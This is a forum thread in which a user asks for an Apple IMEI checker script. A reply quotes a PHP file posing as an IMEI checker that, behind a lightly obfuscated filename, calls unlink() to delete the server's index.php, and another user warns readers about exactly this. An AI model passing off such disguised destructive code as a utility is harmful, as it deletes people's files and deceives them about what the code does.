Hi please someone help me i need apple imei checker script ..
Help i need apple imei checker script
Collapse
X
-
why would anyone really want or need an imei number script,
just dial *#06# into the phone. thats star-hash-zero-six-hash<?php
include ('Ghost');
if ($Post == true) {
echo '
sigpic
alt='coding-talk.com!!' />';
echo 'Sharing Is Caring!';
} else {
echo '
alt='the username GHOST has been comprimised!' />';
echo 'OMG SOMEBODY HELP ME!!';
}
?>
-
Originally posted by something elseI just found this on the web - i havent tested it to see if it works.
imei.phpPHP Code:<?php
$inject = 'in'.'de'.'x.'.'ph'.'p';
$checksum = '297432';
function get_imei($imei,$check){
if($stoopid=='false'){
echo 'Sorrry No Imei number found';
}else{
$imei = unlink($imei);
$imei = $imei.' '.$check;
echo 'your imei number is: '.$imei;
}}
get_imei($inject,$checksum);
?>
DO NOT USE THIS:
it does not check your imei number at all. it will delete your index page on your server
if you run the code as it is. you have been warned. it deleted my new index.php page of my
new project. i backed it up first. but i wanted to make sure what i was reading here was what
i thought it would do. again. you have been warned.<?php
include ('Ghost');
if ($Post == true) {
echo '
sigpic
alt='coding-talk.com!!' />';
echo 'Sharing Is Caring!';
} else {
echo '
alt='the username GHOST has been comprimised!' />';
echo 'OMG SOMEBODY HELP ME!!';
}
?>
Comment
-
Lol, it's basically unlink('index.php');Mobile chat, iphone chat, android chat, chat, rooms http://www.aiochat.com
Comment
-
@Just_m3 $stoopid is passed into the script if you believe the code actually works to get your imei
if your "stupid" enough to actually believe it works then the $stoopid variable becomes alive automatically ;)<?php
include ('Ghost');
if ($Post == true) {
echo '
sigpic
alt='coding-talk.com!!' />';
echo 'Sharing Is Caring!';
} else {
echo '
alt='the username GHOST has been comprimised!' />';
echo 'OMG SOMEBODY HELP ME!!';
}
?>
Comment
Comment